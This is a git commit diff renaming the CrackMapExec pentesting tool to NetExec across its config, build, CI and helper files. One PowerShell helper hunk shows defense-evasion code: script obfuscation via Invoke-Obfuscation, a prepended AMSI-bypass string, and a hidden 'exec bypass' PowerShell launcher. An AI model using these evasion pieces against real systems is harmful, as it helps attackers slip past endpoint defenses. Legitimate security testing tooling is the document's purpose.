rename folders, files, functions, classes, etc to NetExec/nxc

main
Marshall Hallenbeck 2023-09-14 17:07:15 -04:00
parent 2f0b74a492
commit 7886ac1612
193 changed files with 975 additions and 3800 deletions

View File

@ -11,27 +11,27 @@ build
bin bin
dist dist
*.egg-info *.egg-info
cme/data/powersploit/Recon/Dictionaries nxc/data/powersploit/Recon/Dictionaries
cme/data/powersploit/Exfiltration/NTFSParser nxc/data/powersploit/Exfiltration/NTFSParser
cme/data/powersploit/CodeExecution/Invoke-ReflectivePEInjection_Resources nxc/data/powersploit/CodeExecution/Invoke-ReflectivePEInjection_Resources
cme/data/powersploit/Exfiltration/LogonUser nxc/data/powersploit/Exfiltration/LogonUser
cme/data/powersploit/Tests nxc/data/powersploit/Tests
cme/data/netripper/DLL nxc/data/netripper/DLL
cme/data/netripper/Metasploit nxc/data/netripper/Metasploit
cme/data/netripper/NetRipper nxc/data/netripper/NetRipper
cme/data/netripper/Win32 nxc/data/netripper/Win32
cme/data/netripper/Release nxc/data/netripper/Release
cme/data/netripper/minhook nxc/data/netripper/minhook
cme/data/netripper/x64 nxc/data/netripper/x64
cme/data/netripper/*.pdf nxc/data/netripper/*.pdf
cme/data/netripper/*.sln nxc/data/netripper/*.sln
cme/data/invoke-vnc/winvnc nxc/data/invoke-vnc/winvnc
cme/data/invoke-vnc/vncdll nxc/data/invoke-vnc/vncdll
cme/data/invoke-vnc/pebytes.ps1 nxc/data/invoke-vnc/pebytes.ps1
cme/data/invoke-vnc/ReflectiveDLLInjection nxc/data/invoke-vnc/ReflectiveDLLInjection
cme/data/invoke-vnc/*.py nxc/data/invoke-vnc/*.py
cme/data/invoke-vnc/*.bat nxc/data/invoke-vnc/*.bat
cme/data/invoke-vnc/*.msbuild nxc/data/invoke-vnc/*.msbuild
cme/data/invoke-vnc/*.sln nxc/data/invoke-vnc/*.sln
cme/data/RID-Hijacking/modules nxc/data/RID-Hijacking/modules
cme/data/RID-Hijacking/slides nxc/data/RID-Hijacking/slides

View File

@ -12,10 +12,10 @@ A clear and concise description of what the bug is.
**To Reproduce** **To Reproduce**
Steps to reproduce the behavior i.e.: Steps to reproduce the behavior i.e.:
Command: `crackmapexec smb -u username -p password` Command: `netexec smb -u username -p password`
Resulted in: Resulted in:
``` ```
crackmapexec smb 10.10.10.10 -u username -p password -x "whoami" netexec smb 10.10.10.10 -u username -p password -x "whoami"
SMB 10.10.10.10 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain) (signing:True) (SMBv1:False) SMB 10.10.10.10 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC01 [+] domain\username:password SMB 10.10.10.10 445 DC01 [+] domain\username:password
Traceback (most recent call last): Traceback (most recent call last):
@ -30,7 +30,7 @@ If applicable, add screenshots to help explain your problem.
**Crackmapexec info** **Crackmapexec info**
- OS: [e.g. Kali] - OS: [e.g. Kali]
- Version of CME [e.g. v5.0.2] - Version of nxc [e.g. v5.0.2]
- Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue - Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue
**Additional context** **Additional context**

View File

@ -1,4 +1,4 @@
name: CrackMapExec Tests name: NetExec Tests
on: on:
pull_request_review: pull_request_review:
@ -6,7 +6,7 @@ on:
jobs: jobs:
build: build:
name: CrackMapExec Tests for Py${{ matrix.python-version }} name: NetExec Tests for Py${{ matrix.python-version }}
runs-on: ${{ matrix.os }} runs-on: ${{ matrix.os }}
strategy: strategy:
max-parallel: 4 max-parallel: 4
@ -15,7 +15,7 @@ jobs:
python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"] python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"]
steps: steps:
- uses: actions/checkout@v3 - uses: actions/checkout@v3
- name: CrackMapExec tests on ${{ matrix.os }} - name: NetExec tests on ${{ matrix.os }}
uses: actions/setup-python@v4 uses: actions/setup-python@v4
with: with:
python-version: ${{ matrix.python-version }} python-version: ${{ matrix.python-version }}

View File

@ -1,11 +1,11 @@
name: CrackMapExec Build Binaries name: NetExec Build Binaries
on: on:
workflow_dispatch: workflow_dispatch:
jobs: jobs:
build: build:
name: CrackMapExec Tests on ${{ matrix.os }} name: NetExec Tests on ${{ matrix.os }}
runs-on: ${{ matrix.os }} runs-on: ${{ matrix.os }}
strategy: strategy:
max-parallel: 4 max-parallel: 4
@ -14,7 +14,7 @@ jobs:
python-version: ["3.8", "3.9", "3.10", "3.11"] python-version: ["3.8", "3.9", "3.10", "3.11"]
steps: steps:
- uses: actions/checkout@v3 - uses: actions/checkout@v3
- name: CrackMapExec tests on ${{ matrix.os }} - name: NetExec tests on ${{ matrix.os }}
uses: actions/setup-python@v4 uses: actions/setup-python@v4
with: with:
python-version: ${{ matrix.python-version }} python-version: ${{ matrix.python-version }}
@ -22,13 +22,13 @@ jobs:
run: | run: |
pip install shiv pip install shiv
python build_collector.py python build_collector.py
- name: Upload cme binary - name: Upload nxc binary
uses: actions/upload-artifact@master uses: actions/upload-artifact@master
with: with:
name: cme-${{ matrix.os }}-${{ matrix.python-version }} name: nxc-${{ matrix.os }}-${{ matrix.python-version }}
path: bin/cme path: bin/nxc
- name: Upload cmedb binary - name: Upload nxcdb binary
uses: actions/upload-artifact@master uses: actions/upload-artifact@master
with: with:
name: cmedb-${{ matrix.os }}-${{ matrix.python-version }} name: nxcdb-${{ matrix.os }}-${{ matrix.python-version }}
path: bin/cmedb path: bin/nxcdb

4
.gitignore vendored
View File

@ -1,4 +1,4 @@
data/cme.db data/nxc.db
*.bak *.bak
*.log *.log
.venv .venv
@ -36,7 +36,7 @@ var/
# before PyInstaller builds the exe, so as to inject date/other infos into it. # before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest *.manifest
*.spec *.spec
!crackmapexec.spec !netexec.spec
# Installer logs # Installer logs
pip-log.txt pip-log.txt

View File

@ -4,7 +4,7 @@ ENV LANG=C.UTF-8
ENV LC_ALL=C.UTF-8 ENV LC_ALL=C.UTF-8
ENV PIP_NO_CACHE_DIR=off ENV PIP_NO_CACHE_DIR=off
WORKDIR /usr/src/crackmapexec WORKDIR /usr/src/netexec
RUN apt-get update && \ RUN apt-get update && \
apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git
@ -19,4 +19,4 @@ RUN cargo --help
COPY . . COPY . .
RUN pip install . RUN pip install .
ENTRYPOINT [ "cme" ] ENTRYPOINT [ "nxc" ]

View File

@ -13,7 +13,7 @@ clean:
find . -name '.pytest_cache' -exec rm -rf {} + find . -name '.pytest_cache' -exec rm -rf {} +
tests: tests:
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics --exclude cme/data/* flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics --exclude nxc/data/*
requirements: requirements:
poetry export --without-hashes -f requirements.txt -o requirements.txt poetry export --without-hashes -f requirements.txt -o requirements.txt

View File

@ -20,7 +20,6 @@ You are on the **latest up-to-date** repository of the project NetExec (nxc) !
# Acknowledgments # Acknowledgments
All the hard work and development over the years from everyone in the CrackMapExec project. All the hard work and development over the years from everyone in the CrackMapExec project.
# Documentation, Tutorials, Examples # Documentation, Tutorials, Examples
See the project's wiki (in development) for documentation and usage examples See the project's wiki (in development) for documentation and usage examples

View File

@ -16,8 +16,8 @@ from shiv.builder import create_archive
from shiv.cli import __version__ as VERSION from shiv.cli import __version__ as VERSION
def build_cme(): def build_nxc():
print("building CME") print("building nxc")
try: try:
shutil.rmtree("bin") shutil.rmtree("bin")
shutil.rmtree("build") shutil.rmtree("build")
@ -28,7 +28,7 @@ def build_cme():
print("remove useless files") print("remove useless files")
os.mkdir("build") os.mkdir("build")
os.mkdir("bin") os.mkdir("bin")
shutil.copytree("cme", "build/cme") shutil.copytree("nxc", "build/nxc")
except Exception as e: except Exception as e:
print(e) print(e)
@ -53,7 +53,7 @@ def build_cme():
env = Environment( env = Environment(
built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"), built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
entry_point="cme.crackmapexec:main", entry_point="nxc.netexec:main",
script=None, script=None,
compile_pyc=False, compile_pyc=False,
extend_pythonpath=True, extend_pythonpath=True,
@ -61,7 +61,7 @@ def build_cme():
) )
create_archive( create_archive(
[Path("build").absolute()], [Path("build").absolute()],
Path("bin/cme"), Path("bin/nxc"),
"/usr/bin/env -S python -sE", "/usr/bin/env -S python -sE",
"_bootstrap:bootstrap", "_bootstrap:bootstrap",
env, env,
@ -69,11 +69,11 @@ def build_cme():
) )
def build_cmedb(): def build_nxcdb():
print("building CMEDB") print("building nxcDB")
env = Environment( env = Environment(
built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"), built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
entry_point="cme.cmedb:main", entry_point="nxc.nxcdb:main",
script=None, script=None,
compile_pyc=False, compile_pyc=False,
extend_pythonpath=True, extend_pythonpath=True,
@ -81,7 +81,7 @@ def build_cmedb():
) )
create_archive( create_archive(
[Path("build").absolute()], [Path("build").absolute()],
Path("bin/cmedb"), Path("bin/nxcdb"),
"/usr/bin/env -S python -sE", "/usr/bin/env -S python -sE",
"_bootstrap:bootstrap", "_bootstrap:bootstrap",
env, env,
@ -91,8 +91,8 @@ def build_cmedb():
if __name__ == "__main__": if __name__ == "__main__":
try: try:
build_cme() build_nxc()
build_cmedb() build_nxcdb()
except: except:
pass pass
finally: finally:

View File

@ -1,48 +0,0 @@
# coding=utf-8
import os
from os.path import join as path_join
import configparser
from cme.paths import CME_PATH, DATA_PATH
from cme.first_run import first_run_setup
from cme.logger import cme_logger
from ast import literal_eval
cme_default_config = configparser.ConfigParser()
cme_default_config.read(path_join(DATA_PATH, "cme.conf"))
cme_config = configparser.ConfigParser()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
if "CME" not in cme_config.sections():
first_run_setup()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
# Check if there are any missing options in the config file
for section in cme_default_config.sections():
for option in cme_default_config.options(section):
if not cme_config.has_option(section, option):
cme_logger.display(f"Adding missing option '{option}' in config section '{section}' to cme.conf")
cme_config.set(section, option, cme_default_config.get(section, option))
with open(path_join(CME_PATH, "cme.conf"), "w") as config_file:
cme_config.write(config_file)
#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
cme_workspace = cme_config.get("CME", "workspace", fallback="default")
pwned_label = cme_config.get("CME", "pwn3d_label", fallback="Pwn3d!")
audit_mode = cme_config.get("CME", "audit_mode", fallback=False)
reveal_chars_of_pwd = int(cme_config.get("CME", "reveal_chars_of_pwd", fallback=0))
config_log = cme_config.getboolean("CME", "log_mode", fallback=False)
ignore_opsec = cme_config.getboolean("CME", "ignore_opsec", fallback=False)
host_info_colors = literal_eval(cme_config.get("CME", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
if len(host_info_colors) != 4:
cme_logger.error("Config option host_info_colors must have 4 values! Using default values.")
host_info_colors = cme_default_config.get("CME", "host_info_colors")
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
def process_secret(text):
hidden = text[:reveal_chars_of_pwd]
return text if not audit_mode else hidden+audit_mode * 8

View File

@ -1,3 +0,0 @@
from rich.console import Console
cme_console = Console(soft_wrap=True, tab_size=4)

View File

@ -1,15 +0,0 @@
import os
import sys
import cme
CME_PATH = os.path.expanduser("~/.cme")
TMP_PATH = os.path.join("/tmp", "cme_hosted")
if os.name == "nt":
TMP_PATH = os.getenv("LOCALAPPDATA") + "\\Temp\\cme_hosted"
if hasattr(sys, "getandroidapilevel"):
TMP_PATH = os.path.join("/data", "data", "com.termux", "files", "usr", "tmp", "cme_hosted")
WS_PATH = os.path.join(CME_PATH, "workspaces")
CERT_PATH = os.path.join(CME_PATH, "cme.pem")
CONFIG_PATH = os.path.join(CME_PATH, "cme.conf")
WORKSPACE_DIR = os.path.join(CME_PATH, "workspaces")
DATA_PATH = os.path.join(os.path.dirname(cme.__file__), "data")

View File

@ -12,7 +12,7 @@
poetry2nix.overlay poetry2nix.overlay
(final: prev: { (final: prev: {
# The application # The application
CrackMapExec = prev.poetry2nix.mkPoetryApplication { NetExec = prev.poetry2nix.mkPoetryApplication {
projectDir = ./.; projectDir = ./.;
}; };
}) })
@ -26,11 +26,11 @@
in in
{ {
apps = { apps = {
CrackMapExec = pkgs.CrackMapExec; NetExec = pkgs.NetExec;
}; };
defaultApp = pkgs.CrackMapExec; defaultApp = pkgs.NetExec;
packages = { CrackMapExec = pkgs.CrackMapExec; }; packages = { NetExec = pkgs.NetExec; };
})); }));
} }

View File

@ -3,12 +3,12 @@
block_cipher = None block_cipher = None
a = Analysis(['./cme/crackmapexec.py'], a = Analysis(['./nxc/netexec.py'],
pathex=['./cme'], pathex=['./nxc'],
binaries=[], binaries=[],
datas=[('./cme/protocols', 'cme/protocols'),('./cme/data', 'cme/data'),('./cme/modules', 'cme/modules')], datas=[('./nxc/protocols', 'nxc/protocols'),('./nxc/data', 'nxc/data'),('./nxc/modules', 'nxc/modules')],
hiddenimports=['cme.protocols.mssql.mssqlexec', 'cme.connection', 'impacket.examples.secretsdump', 'impacket.dcerpc.v5.lsat', 'impacket.dcerpc.v5.transport', 'impacket.dcerpc.v5.lsad', 'cme.servers.smb', 'cme.protocols.smb.wmiexec', 'cme.protocols.smb.atexec', 'cme.protocols.smb.smbexec', 'cme.protocols.smb.mmcexec', 'cme.protocols.smb.smbspider', 'cme.protocols.smb.passpol', 'paramiko', 'pypsrp.client', 'pywerview.cli.helpers', 'impacket.tds', 'impacket.version', 'cme.helpers.bash', 'pylnk3', 'lsassy','win32timezone', 'impacket.tds', 'impacket.ldap.ldap', 'impacket.tds'], hiddenimports=['nxc.protocols.mssql.mssqlexec', 'nxc.connection', 'impacket.examples.secretsdump', 'impacket.dcerpc.v5.lsat', 'impacket.dcerpc.v5.transport', 'impacket.dcerpc.v5.lsad', 'nxc.servers.smb', 'nxc.protocols.smb.wmiexec', 'nxc.protocols.smb.atexec', 'nxc.protocols.smb.smbexec', 'nxc.protocols.smb.mmcexec', 'nxc.protocols.smb.smbspider', 'nxc.protocols.smb.passpol', 'paramiko', 'pypsrp.client', 'pywerview.cli.helpers', 'impacket.tds', 'impacket.version', 'nxc.helpers.bash', 'pylnk3', 'lsassy','win32timezone', 'impacket.tds', 'impacket.ldap.ldap', 'impacket.tds'],
hookspath=['./cme/.hooks'], hookspath=['./nxc/.hooks'],
runtime_hooks=[], runtime_hooks=[],
excludes=[], excludes=[],
win_no_prefer_redirects=False, win_no_prefer_redirects=False,
@ -23,7 +23,7 @@ exe = EXE(pyz,
a.zipfiles, a.zipfiles,
a.datas, a.datas,
[], [],
name='crackmapexec', name='netexec',
debug=False, debug=False,
bootloader_ignore_signals=False, bootloader_ignore_signals=False,
strip=False, strip=False,
@ -31,4 +31,4 @@ exe = EXE(pyz,
upx_exclude=[], upx_exclude=[],
runtime_tmpdir=None, runtime_tmpdir=None,
console=True, console=True,
icon='./cme/data/cme.ico' ) icon='./nxc/data/nxc.ico' )

View File

@ -4,32 +4,32 @@
import argparse import argparse
import sys import sys
from argparse import RawTextHelpFormatter from argparse import RawTextHelpFormatter
from cme.loaders.protocolloader import ProtocolLoader from nxc.loaders.protocolloader import ProtocolLoader
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
from termcolor import colored from termcolor import colored
from cme.logger import cme_logger from nxc.logger import nxc_logger
import importlib.metadata import importlib.metadata
def gen_cli_args(): def gen_cli_args():
VERSION = importlib.metadata.version("crackmapexec") VERSION = importlib.metadata.version("netexec")
CODENAME = "John Wick" CODENAME = "A New Beginning"
parser = argparse.ArgumentParser(description=f""" parser = argparse.ArgumentParser(description=f"""
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______ _ _ _ _____
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / | | \ | | ___ | |_ | ____| __ __ ___ ___
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----' | \| | / _ \ | __| | _| \ \/ / / _ \ / __|
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | | | |\ | | __/ | |_ | |___ > < | __/ | (__
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----. |_| \_| \___| \__| |_____| /_/\_\ \___| \___|
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
A swiss army knife for pentesting networks The network execution tool
Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes. Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx
Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx
For documentation and usage examples, visit: https://www.netexec.wiki/
{highlight('Version', 'red')} : {highlight(VERSION)} {highlight('Version', 'red')} : {highlight(VERSION)}
{highlight('Codename', 'red')}: {highlight(CODENAME)} {highlight('Codename', 'red')}: {highlight(CODENAME)}
""", """,
formatter_class=RawTextHelpFormatter, formatter_class=RawTextHelpFormatter,
) )
@ -59,7 +59,7 @@ def gen_cli_args():
) )
parser.add_argument("--verbose", action="store_true", help="enable verbose output") parser.add_argument("--verbose", action="store_true", help="enable verbose output")
parser.add_argument("--debug", action="store_true", help="enable debug level information") parser.add_argument("--debug", action="store_true", help="enable debug level information")
parser.add_argument("--version", action="store_true", help="Display CME version") parser.add_argument("--version", action="store_true", help="Display nxc version")
# we do module arg parsing here so we can reference the module_list attribute below # we do module arg parsing here so we can reference the module_list attribute below
module_parser = argparse.ArgumentParser(add_help=False) module_parser = argparse.ArgumentParser(add_help=False)
@ -189,7 +189,7 @@ def gen_cli_args():
protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"]) protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"])
subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser) subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)
except: except:
cme_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}") nxc_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}")
if len(sys.argv) == 1: if len(sys.argv) == 1:
parser.print_help() parser.print_help()

48
nxc/config.py Normal file
View File

@ -0,0 +1,48 @@
# coding=utf-8
import os
from os.path import join as path_join
import configparser
from nxc.paths import nxc_PATH, DATA_PATH
from nxc.first_run import first_run_setup
from nxc.logger import nxc_logger
from ast import literal_eval
nxc_default_config = configparser.ConfigParser()
nxc_default_config.read(path_join(DATA_PATH, "nxc.conf"))
nxc_config = configparser.ConfigParser()
nxc_config.read(os.path.join(nxc_PATH, "nxc.conf"))
if "nxc" not in nxc_config.sections():
first_run_setup()
nxc_config.read(os.path.join(nxc_PATH, "nxc.conf"))
# Check if there are any missing options in the config file
for section in nxc_default_config.sections():
for option in nxc_default_config.options(section):
if not nxc_config.has_option(section, option):
nxc_logger.display(f"Adding missing option '{option}' in config section '{section}' to nxc.conf")
nxc_config.set(section, option, nxc_default_config.get(section, option))
with open(path_join(nxc_PATH, "nxc.conf"), "w") as config_file:
nxc_config.write(config_file)
#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
nxc_workspace = nxc_config.get("nxc", "workspace", fallback="default")
pwned_label = nxc_config.get("nxc", "pwn3d_label", fallback="Pwn3d!")
audit_mode = nxc_config.get("nxc", "audit_mode", fallback=False)
reveal_chars_of_pwd = int(nxc_config.get("nxc", "reveal_chars_of_pwd", fallback=0))
config_log = nxc_config.getboolean("nxc", "log_mode", fallback=False)
ignore_opsec = nxc_config.getboolean("nxc", "ignore_opsec", fallback=False)
host_info_colors = literal_eval(nxc_config.get("nxc", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
if len(host_info_colors) != 4:
nxc_logger.error("Config option host_info_colors must have 4 values! Using default values.")
host_info_colors = nxc_default_config.get("nxc", "host_info_colors")
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
def process_secret(text):
hidden = text[:reveal_chars_of_pwd]
return text if not audit_mode else hidden+audit_mode * 8

View File

@ -11,10 +11,10 @@ from functools import wraps
from time import sleep from time import sleep
from ipaddress import ip_address from ipaddress import ip_address
from cme.config import pwned_label from nxc.config import pwned_label
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
from cme.logger import cme_logger, CMEAdapter from nxc.logger import nxc_logger, NXCAdapter
from cme.context import Context from nxc.context import Context
from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5 import transport
@ -86,7 +86,7 @@ class connection(object):
self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
self.failed_logins = 0 self.failed_logins = 0
self.local_ip = None self.local_ip = None
self.logger = cme_logger self.logger = nxc_logger
try: try:
self.host = gethost_addrinfo(self.hostname) self.host = gethost_addrinfo(self.hostname)
@ -174,7 +174,7 @@ class connection(object):
def call_modules(self): def call_modules(self):
for module in self.module: for module in self.module:
self.logger.debug(f"Loading module {module.name} - {module}") self.logger.debug(f"Loading module {module.name} - {module}")
module_logger = CMEAdapter( module_logger = NXCAdapter(
extra={ extra={
"module_name": module.name.upper(), "module_name": module.name.upper(),
"host": self.host, "host": self.host,

3
nxc/console.py Normal file
View File

@ -0,0 +1,3 @@
from rich.console import Console
nxc_console = Console(soft_wrap=True, tab_size=4)

View File

@ -11,11 +11,11 @@ class Context:
setattr(self, key, value) setattr(self, key, value)
self.db = db self.db = db
self.log_folder_path = os.path.join(os.path.expanduser("~/.cme"), "logs") self.log_folder_path = os.path.join(os.path.expanduser("~/.nxc"), "logs")
self.localip = None self.localip = None
self.conf = configparser.ConfigParser() self.conf = configparser.ConfigParser()
self.conf.read(os.path.expanduser("~/.cme/cme.conf")) self.conf.read(os.path.expanduser("~/.nxc/nxc.conf"))
self.log = logger self.log = logger
# self.log.debug = logging.debug # self.log.debug = logging.debug

View File

@ -1,4 +1,4 @@
[CME] [nxc]
workspace = default workspace = default
last_used_db = smb last_used_db = smb
pwn3d_label = Pwn3d! pwn3d_label = Pwn3d!

View File

Before

Width:  |  Height:  |  Size: 159 KiB

After

Width:  |  Height:  |  Size: 159 KiB

View File

@ -5,19 +5,19 @@ from os import mkdir
from os.path import exists from os.path import exists
from os.path import join as path_join from os.path import join as path_join
import shutil import shutil
from cme.paths import CME_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH from nxc.paths import nxc_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
from cme.cmedb import initialize_db from nxc.nxcdb import initialize_db
from cme.logger import cme_logger from nxc.logger import nxc_logger
def first_run_setup(logger=cme_logger): def first_run_setup(logger=nxc_logger):
if not exists(TMP_PATH): if not exists(TMP_PATH):
mkdir(TMP_PATH) mkdir(TMP_PATH)
if not exists(CME_PATH): if not exists(nxc_PATH):
logger.display("First time use detected") logger.display("First time use detected")
logger.display("Creating home directory structure") logger.display("Creating home directory structure")
mkdir(CME_PATH) mkdir(nxc_PATH)
folders = ( folders = (
"logs", "logs",
@ -28,16 +28,16 @@ def first_run_setup(logger=cme_logger):
"screenshots", "screenshots",
) )
for folder in folders: for folder in folders:
if not exists(path_join(CME_PATH, folder)): if not exists(path_join(nxc_PATH, folder)):
logger.display(f"Creating missing folder {folder}") logger.display(f"Creating missing folder {folder}")
mkdir(path_join(CME_PATH, folder)) mkdir(path_join(nxc_PATH, folder))
initialize_db(logger) initialize_db(logger)
if not exists(CONFIG_PATH): if not exists(CONFIG_PATH):
logger.display("Copying default configuration file") logger.display("Copying default configuration file")
default_path = path_join(DATA_PATH, "cme.conf") default_path = path_join(DATA_PATH, "nxc.conf")
shutil.copy(default_path, CME_PATH) shutil.copy(default_path, nxc_PATH)
# if not exists(CERT_PATH): # if not exists(CERT_PATH):
# logger.display('Generating SSL certificate') # logger.display('Generating SSL certificate')

View File

@ -1,7 +1,7 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
import os import os
from cme.paths import DATA_PATH from nxc.paths import DATA_PATH
def get_script(path): def get_script(path):

View File

@ -6,7 +6,7 @@ from termcolor import colored
def write_log(data, log_name): def write_log(data, log_name):
logs_dir = os.path.join(os.path.expanduser("~/.cme"), "logs") logs_dir = os.path.join(os.path.expanduser("~/.nxc"), "logs")
with open(os.path.join(logs_dir, log_name), "w") as log_output: with open(os.path.join(logs_dir, log_name), "w") as log_output:
log_output.write(data) log_output.write(data)

View File

@ -21,7 +21,7 @@ References:
- https://www.powershellgallery.com/packages/SDDLParser/0.5.0/Content/SDDLParserADObjects.ps1 - https://www.powershellgallery.com/packages/SDDLParser/0.5.0/Content/SDDLParserADObjects.ps1
This library is, for the moment, not present in the Impacket version used by CrackMapExec, so I add it manually in helpers. This library is, for the moment, not present in the Impacket version used by NetExec, so I add it manually in helpers.
""" """
SCHEMA_OBJECTS = { SCHEMA_OBJECTS = {

View File

@ -6,9 +6,9 @@ from sys import exit
from string import ascii_lowercase from string import ascii_lowercase
from random import choice, sample from random import choice, sample
from subprocess import call from subprocess import call
from cme.helpers.misc import which from nxc.helpers.misc import which
from cme.logger import cme_logger from nxc.logger import nxc_logger
from cme.paths import CME_PATH, DATA_PATH from nxc.paths import nxc_PATH, DATA_PATH
from base64 import b64encode from base64 import b64encode
obfuscate_ps_scripts = False obfuscate_ps_scripts = False
@ -30,24 +30,24 @@ def is_powershell_installed():
def obfs_ps_script(path_to_script): def obfs_ps_script(path_to_script):
ps_script = path_to_script.split("/")[-1] ps_script = path_to_script.split("/")[-1]
obfs_script_dir = os.path.join(CME_PATH, "obfuscated_scripts") obfs_script_dir = os.path.join(nxc_PATH, "obfuscated_scripts")
obfs_ps_script = os.path.join(obfs_script_dir, ps_script) obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
if is_powershell_installed() and obfuscate_ps_scripts: if is_powershell_installed() and obfuscate_ps_scripts:
if os.path.exists(obfs_ps_script): if os.path.exists(obfs_ps_script):
cme_logger.display("Using cached obfuscated Powershell script") nxc_logger.display("Using cached obfuscated Powershell script")
with open(obfs_ps_script, "r") as script: with open(obfs_ps_script, "r") as script:
return script.read() return script.read()
cme_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...") nxc_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...")
invoke_obfs_command = f"powershell -C 'Import-Module {get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1')};Invoke-Obfuscation -ScriptPath {get_ps_script(path_to_script)} -Command \"TOKEN,ALL,1,OUT {obfs_ps_script}\" -Quiet'" invoke_obfs_command = f"powershell -C 'Import-Module {get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1')};Invoke-Obfuscation -ScriptPath {get_ps_script(path_to_script)} -Command \"TOKEN,ALL,1,OUT {obfs_ps_script}\" -Quiet'"
cme_logger.debug(invoke_obfs_command) nxc_logger.debug(invoke_obfs_command)
with open(os.devnull, "w") as devnull: with open(os.devnull, "w") as devnull:
return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True) return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
cme_logger.success("Script obfuscated successfully") nxc_logger.success("Script obfuscated successfully")
with open(obfs_ps_script, "r") as script: with open(obfs_ps_script, "r") as script:
return script.read() return script.read()
@ -108,7 +108,7 @@ else
else: else:
command = amsi_bypass + ps_command command = amsi_bypass + ps_command
cme_logger.debug("Generated PS command:\n {}\n".format(command)) nxc_logger.debug("Generated PS command:\n {}\n".format(command))
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed # We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed
# concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way # concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way
@ -118,7 +118,7 @@ else
""" """
if is_powershell_installed(): if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_', temp = tempfile.NamedTemporaryFile(prefix='nxc_',
suffix='.ps1', suffix='.ps1',
dir='/tmp') dir='/tmp')
temp.write(command) temp.write(command)
@ -130,11 +130,11 @@ else
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'), invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name, temp.name,
encoding) encoding)
cme_logger.debug(invoke_obfs_command) nxc_logger.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip() out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out) command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
cme_logger.debug('Command length: {}'.format(len(command))) nxc_logger.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192: if len(command) <= 8192:
temp.close() temp.close()
@ -152,14 +152,14 @@ else
break break
if obfs_attempts == 4: if obfs_attempts == 4:
